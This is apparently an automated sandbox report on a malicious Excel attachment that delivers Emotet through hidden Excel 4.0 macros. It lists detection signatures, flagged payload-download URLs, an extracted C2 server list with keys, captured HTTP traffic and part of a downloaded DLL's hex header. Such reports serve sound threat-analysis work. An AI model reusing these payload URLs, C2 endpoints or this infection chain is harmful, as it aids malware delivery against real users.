Windows Analysis Report
Attachment-2801.xls

Overview

General Information

Sample Name: Attachment-2801.xls
Analysis ID: 562421
MD5: 1ebbc323e2e777140566b017623d9ca0
SHA1: c7474a397a858cc68f2d83940af82fdedd8181d7
SHA256: 24100d1dff5dd7cee8e8c738570665f7882dd9be8f836ccca24abb7876a15661
Tags: SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Obfuscated command line found
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://91.240.118.168/oo/aa/se.htmlmshta Avira URL Cloud: Label: malware
Source: http://91.240.118.168/oo/aa/se.pngPE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/oo/aa/se.htmlhttp://91.240.118.168/oo/aa/se.html Avira URL Cloud: Label: malware
Source: http://91.240.118.168/oo/aa/se.htmlY Avira URL Cloud: Label: malware
Source: http://91.240.118.168/oo/aa/se.p Avira URL Cloud: Label: malware
Source: http://unitedhorus.com/wp-conten Avira URL Cloud: Label: malware
Source: http://farmmash.com/edh2fa/g2Q7Qbgs/ Avira URL Cloud: Label: malware
Source: http://il-piccolo-principe.com/wp-content/Ua9GvD7acXnDz/PE3 Avira URL Cloud: Label: malware
Source: http://unitedhorus.com/wp-content/m3oxVSV2uYW2rbh/PE3 Avira URL Cloud: Label: malware
Source: http://3-fasen.com/wp-content/3Bl0hBbW/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/oo/aa/se.htmld Avira URL Cloud: Label: malware
Source: http://tastedonline.com/cgi-bin/GOHSO621KlmM6m/PE3 Avira URL Cloud: Label: malware
Source: http://tastedonline.com/cgi-bin/GOHSO621KlmM6m/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/oo/aa/se.htmlt Avira URL Cloud: Label: malware
Source: http://centrobilinguelospinos.com/wp-admin/w8528qkQnMPLDUc/PE3 Avira URL Cloud: Label: malware
Source: http://wencollection.com/wp-admin/pY6t2bVC0QWEpk7Q/ Avira URL Cloud: Label: malware
Source: http://il-piccolo-principe.com/wp-content/Ua9GvD7acXnDz/ Avira URL Cloud: Label: malware
Source: http://3-fasen.com/wp-content/3B Avira URL Cloud: Label: malware
Source: http://karensgardentips.com/cgi-bin/hfpv/PE3 Avira URL Cloud: Label: malware
Source: http://3-fasen.com/wp-content/3Bl0hBbW/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/oo/aa/se.htmlWinSta0 Avira URL Cloud: Label: malware
Source: http://vldispatch.com/licenses/JE6Ol2dfhrk/PE3 Avira URL Cloud: Label: malware
Source: http://vldispatch.com/licenses/JE6Ol2dfhrk/ Avira URL Cloud: Label: malware
Source: http://vldispatch.com/licenses/J Avira URL Cloud: Label: malware
Source: http://91.240.118.168/oo/aa/se.htmlfunction Avira URL Cloud: Label: malware
Source: http://91.240.118.168/oo/aa/se.png Avira URL Cloud: Label: malware
Source: http://centrobilinguelospinos.com/wp-admin/w8528qkQnMPLDUc/ Avira URL Cloud: Label: malware
Source: http://hardstonecap.com/well-known/ps9kNMgc6/ Avira URL Cloud: Label: malware
Source: http://tastedonline.com/cgi-bin/ Avira URL Cloud: Label: malware
Source: http://tombet.net/jmaruk/fd8sVaiAcwcsfMdONH/ Avira URL Cloud: Label: malware
Source: http://karensgardentips.com/cgi-bin/hfpv/ Avira URL Cloud: Label: malware
Source: http://farmmash.com Avira URL Cloud: Label: malware
Source: http://baldcover.com/wp-admin/oRwkRUWpbJ55/PE3 Avira URL Cloud: Label: malware
Source: http://tombet.net/jmaruk/fd8sVai Avira URL Cloud: Label: malware
Source: http://farmmash.com/edh2fa/g2Q7Qbgs/PE3 Avira URL Cloud: Label: malware
Source: http://karensgardentips.com Avira URL Cloud: Label: malware
Source: http://baldcover.com/wp-admin/oRwkRUWpbJ55/ Avira URL Cloud: Label: malware
Source: http://karensgardentips.com/cgi- Avira URL Cloud: Label: malware
Source: http://wencollection.com/wp-admin/pY6t2bVC0QWEpk7Q/PE3 Avira URL Cloud: Label: malware
Source: http://farmmash.com/edh2fa/g2Q7Q Avira URL Cloud: Label: malware
Source: http://hardstonecap.com/well-known/ps9kNMgc6/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/oo/aa/se.htmlngs Avira URL Cloud: Label: malware
Source: http://hardstonecap.com/well-kno Avira URL Cloud: Label: malware
Source: http://wencollection.com/wp-admi Avira URL Cloud: Label: phishing
Source: http://tombet.net/jmaruk/fd8sVaiAcwcsfMdONH/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/oo/aa/se.html? Avira URL Cloud: Label: malware
Source: http://il-piccolo-principe.com/w Avira URL Cloud: Label: malware
Source: http://91.240.118.168 URL Reputation: Label: malware
Source: http://unitedhorus.com/wp-content/m3oxVSV2uYW2rbh/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/oo/aa/se.html Avira URL Cloud: Label: malware
Found malware configuration
Source: 19.2.rundll32.exe.500000.2.raw.unpack Malware Configuration Extractor: Emotet {"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
Multi AV Scanner detection for submitted file
Source: Attachment-2801.xls ReversingLabs: Detection: 25%
Multi AV Scanner detection for domain / URL
Source: farmmash.com Virustotal: Detection: 5% Perma Link
Machine Learning detection for dropped file
Source: C:\ProgramData\QWER.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbo source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBBa source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.168:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: farmmash.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.168:80

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.168:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 74.207.230.120:8080
Source: Malware configuration extractor IPs: 139.196.72.155:8080
Source: Malware configuration extractor IPs: 37.44.244.177:8080
Source: Malware configuration extractor IPs: 37.59.209.141:8080
Source: Malware configuration extractor IPs: 116.124.128.206:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 54.37.228.122:443
Source: Malware configuration extractor IPs: 203.153.216.46:443
Source: Malware configuration extractor IPs: 168.197.250.14:80
Source: Malware configuration extractor IPs: 207.148.81.119:8080
Source: Malware configuration extractor IPs: 195.154.146.35:443
Source: Malware configuration extractor IPs: 78.46.73.125:443
Source: Malware configuration extractor IPs: 191.252.103.16:80
Source: Malware configuration extractor IPs: 210.57.209.142:8080
Source: Malware configuration extractor IPs: 185.168.130.138:443
Source: Malware configuration extractor IPs: 142.4.219.173:8080
Source: Malware configuration extractor IPs: 118.98.72.86:443
Source: Malware configuration extractor IPs: 78.47.204.80:443
Source: Malware configuration extractor IPs: 159.69.237.188:443
Source: Malware configuration extractor IPs: 190.90.233.66:443
Source: Malware configuration extractor IPs: 104.131.62.48:8080
Source: Malware configuration extractor IPs: 62.171.178.147:8080
Source: Malware configuration extractor IPs: 185.148.168.15:8080
Source: Malware configuration extractor IPs: 54.38.242.185:443
Source: Malware configuration extractor IPs: 198.199.98.78:8080
Source: Malware configuration extractor IPs: 194.9.172.107:8080
Source: Malware configuration extractor IPs: 85.214.67.203:8080
Source: Malware configuration extractor IPs: 66.42.57.149:443
Source: Malware configuration extractor IPs: 185.148.168.220:8080
Source: Malware configuration extractor IPs: 103.41.204.169:8080
Source: Malware configuration extractor IPs: 128.199.192.135:8080
Source: Malware configuration extractor IPs: 195.77.239.39:8080
Source: Malware configuration extractor IPs: 59.148.253.194:443
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /oo/aa/se.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /edh2fa/g2Q7Qbgs/ HTTP/1.1Host: farmmash.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-bin/hfpv/ HTTP/1.1Host: karensgardentips.comConnection: Keep-Alive
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 20:21:37 GMTServer: ApacheX-Powered-By: PHP/5.4.45Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Fri, 28 Jan 2022 20:21:37 GMTContent-Disposition: attachment; filename="07n3S5no6.dll"Content-Transfer-Encoding: binarySet-Cookie: 61f45051259b8=1643401297; expires=Fri, 28-Jan-2022 20:22:37 GMT; path=/Last-Modified: Fri, 28 Jan 2022 20:21:37 GMTContent-Length: 557056Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /oo/aa/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS AS-CHOOPAUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 207.148.81.119 207.148.81.119
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 15
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://3-fasen.c
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://3-fasen.com/wp-content/3B
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://3-fasen.com/wp-content/3Bl0hBbW/
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://3-fasen.com/wp-content/3Bl0hBbW/PE3
Source: Attachment-2801.xls.0.dr String found in binary or memory: http://91.2
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168
Source: mshta.exe, 00000004.00000002.429840863.0000000003440000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/oo/aa/se.html
Source: mshta.exe, 00000004.00000002.429463646.0000000000206000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/oo/aa/se.html?
Source: mshta.exe, 00000004.00000002.429542610.00000000002E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/oo/aa/se.htmlWinSta0
Source: mshta.exe, 00000004.00000002.429556102.000000000031E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/oo/aa/se.htmlY
Source: mshta.exe, 00000004.00000002.429556102.000000000031E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/oo/aa/se.htmld
Source: mshta.exe, 00000004.00000003.417084195.00000000031FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/oo/aa/se.htmlfunction
Source: mshta.exe, 00000004.00000003.416873808.00000000031F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/oo/aa/se.htmlhttp://91.240.118.168/oo/aa/se.html
Source: mshta.exe, 00000004.00000002.429542610.00000000002E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/oo/aa/se.htmlmshta
Source: mshta.exe, 00000004.00000002.429556102.000000000031E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/oo/aa/se.htmlngs
Source: mshta.exe, 00000004.00000003.414921431.0000000000368000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/oo/aa/se.htmlt
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/oo/aa/se.p
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.681475476.000000001B877000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/oo/aa/se.png
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/oo/aa/se.pngPE3
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://baldcover.com/wp-admin/oR
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://baldcover.com/wp-admin/oRwkRUWpbJ55/
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://baldcover.com/wp-admin/oRwkRUWpbJ55/PE3
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://centrobilinguelospinos.co
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://centrobilinguelospinos.com/wp-admin/w8528qkQnMPLDUc/
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://centrobilinguelospinos.com/wp-admin/w8528qkQnMPLDUc/PE3
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://farmmash.com
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://farmmash.com/edh2fa/g2Q7Q
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://farmmash.com/edh2fa/g2Q7Qbgs/
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://farmmash.com/edh2fa/g2Q7Qbgs/PE3
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hardstonecap.com/well-kno
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hardstonecap.com/well-known/ps9kNMgc6/
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hardstonecap.com/well-known/ps9kNMgc6/PE3
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://il-piccolo-principe.com/w
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://il-piccolo-principe.com/wp-content/Ua9GvD7acXnDz/
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://il-piccolo-principe.com/wp-content/Ua9GvD7acXnDz/PE3
Source: rundll32.exe, 00000015.00000002.671902573.0000000001DE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000015.00000002.671902573.0000000001DE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://karensgardentips.com
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://karensgardentips.com/cgi-
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://karensgardentips.com/cgi-bin/hfpv/
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://karensgardentips.com/cgi-bin/hfpv/PE3
Source: rundll32.exe, 00000015.00000002.673705499.0000000001FC7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000015.00000002.673705499.0000000001FC7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000015.00000002.675077264.0000000002A80000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000015.00000002.673705499.0000000001FC7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tastedonline.com/cgi-bin/
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tastedonline.com/cgi-bin/GOHSO621KlmM6m/
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tastedonline.com/cgi-bin/GOHSO621KlmM6m/PE3
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tombet.ne
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tombet.net/jmaruk/fd8sVai
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tombet.net/jmaruk/fd8sVaiAcwcsfMdONH/
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tombet.net/jmaruk/fd8sVaiAcwcsfMdONH/PE3
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unitedhorus.com/wp-conten
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unitedhorus.com/wp-content/m3oxVSV2uYW2rbh/
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unitedhorus.com/wp-content/m3oxVSV2uYW2rbh/PE3
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://vldispatch.com/licenses/J
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://vldispatch.com/licenses/JE6Ol2dfhrk/
Source: powershell.exe, 00000006.00000002.676279875.000000000360F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://vldispatch.com/licenses/JE6Ol2dfhrk/PE3
